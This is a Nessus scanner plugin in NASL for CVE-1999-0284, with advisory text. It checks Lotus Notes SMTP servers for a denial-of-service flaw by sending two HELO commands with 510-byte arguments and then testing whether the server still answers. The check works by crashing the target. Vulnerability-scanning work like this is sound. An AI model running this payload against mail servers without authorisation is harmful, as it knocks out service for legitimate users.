#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10162);
 script_version ("$Revision: 1.24 $");
 script_cve_id("CVE-1999-0284");
 name["english"] = "Notes MTA Denial of Service";
 script_name(english:name["english"]);
 
 desc["english"] = "
Synopsis :

The remote mail server is susceptible to a denial of service attack. 

Description :

It was possible to perform a denial of service against the remote SMTP
server by sending it two HELO commands followed by a too long
argument.  This allows an unauthenticated remote attacker to deny
service to legitimate users of the server. 

See also :

http://archives.neohapsis.com/archives/bugtraq/1999_1/0199.html

Solution : 

Contact the vendor for a fix.

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P)";
 script_description(english:desc["english"]);
 
 summary["english"] = "Crashes the remote SMTP server";
 script_summary(english:summary["english"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Denial of Service";
 script_family(english:family["english"]);
 script_dependencie("smtpserver_detect.nasl", "sendmail_expn.nasl");
 script_exclude_keys("SMTP/wrapped");
 script_require_ports("Services/smtp", 25);
 exit(0);
}

#
# The script code starts here
#

include("smtp_func.inc");

port = get_kb_item("Services/smtp");
if(!port)port = 25;
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);

if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  s = smtp_recv_banner(socket:soc);
  if("220 " >!< s){
  	close(soc);
	exit(0);
	}
  c = string("HELO ", crap(510), "\r\n");
  z = crap(length:510, data:"Y");
  d = string("HELO ", z, "\r\n");
  send(socket:soc, data:c);
  s = recv_line(socket:soc, length:1024);
  if ( ! s ) exit(0);
  send(socket:soc, data:d);
  close(soc);
  
  flaw = 0;
  soc2 = open_sock_tcp(port);
  if(!soc2)flaw = 1;
  else {
  	a = recv_line(socket:soc2, length:1024);
	if(!a)flaw = 1;
 	close(soc2);
       }
  
  if(flaw)security_warning(port);
  }
 }
